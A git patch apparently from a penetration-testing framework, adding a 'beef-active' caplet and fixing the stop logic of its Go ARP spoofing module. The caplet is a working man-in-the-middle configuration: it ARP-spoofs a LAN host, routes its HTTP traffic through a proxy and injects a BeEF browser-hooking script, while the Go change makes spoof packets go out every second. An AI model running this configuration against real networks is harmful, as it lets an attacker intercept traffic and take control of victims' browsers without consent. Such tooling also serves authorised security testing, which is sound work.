From a849692468903276d852abba90c3312e65af92b2 Mon Sep 17 00:00:00 2001 From: evilsocket Date: Sun, 7 Jan 2018 23:40:26 +0100 Subject: [PATCH] fix: fixed arp spoofer stop --- caplets/beef-active.cap | 17 +++++++++++++++++ session/modules/arp_spoof.go | 6 +++--- 2 files changed, 20 insertions(+), 3 deletions(-) create mode 100644 caplets/beef-active.cap diff --git a/caplets/beef-active.cap b/caplets/beef-active.cap new file mode 100644 index 00000000..8d0e3f94 --- /dev/null +++ b/caplets/beef-active.cap @@ -0,0 +1,17 @@ +set arp.spoof.targets 192.168.1.53 +# inject beef hook +set http.proxy.script caplets/beef-inject.js +# keep reading arp table for network mapping +net.recon on +# redirect http traffic to a proxy +http.proxy on +# wait for everything to start properly +sleep 1 + +arp.spoof on + + + + + + diff --git a/session/modules/arp_spoof.go b/session/modules/arp_spoof.go index a17497be..1a774a2b 100644 --- a/session/modules/arp_spoof.go +++ b/session/modules/arp_spoof.go @@ -38,12 +38,12 @@ func NewArpSpoofer(s *session.Session) *ArpSpoofer { return p } -func (p ArpSpoofer) OnSessionStarted(s *session.Session) { +func (p *ArpSpoofer) OnSessionStarted(s *session.Session) { // refresh the subnet after session has been created s.Env.Set("arp.spoof.targets", s.Interface.CIDR()) } -func (p ArpSpoofer) OnSessionEnded(s *session.Session) { +func (p *ArpSpoofer) OnSessionEnded(s *session.Session) { if p.Running() { p.Stop() } @@ -186,7 +186,7 @@ func (p *ArpSpoofer) Start() error { for p.Running() { p.sendArp(addresses, from, from_hw, true, false) - time.Sleep(5 * time.Second) + time.Sleep(1 * time.Second) } p.Done <- true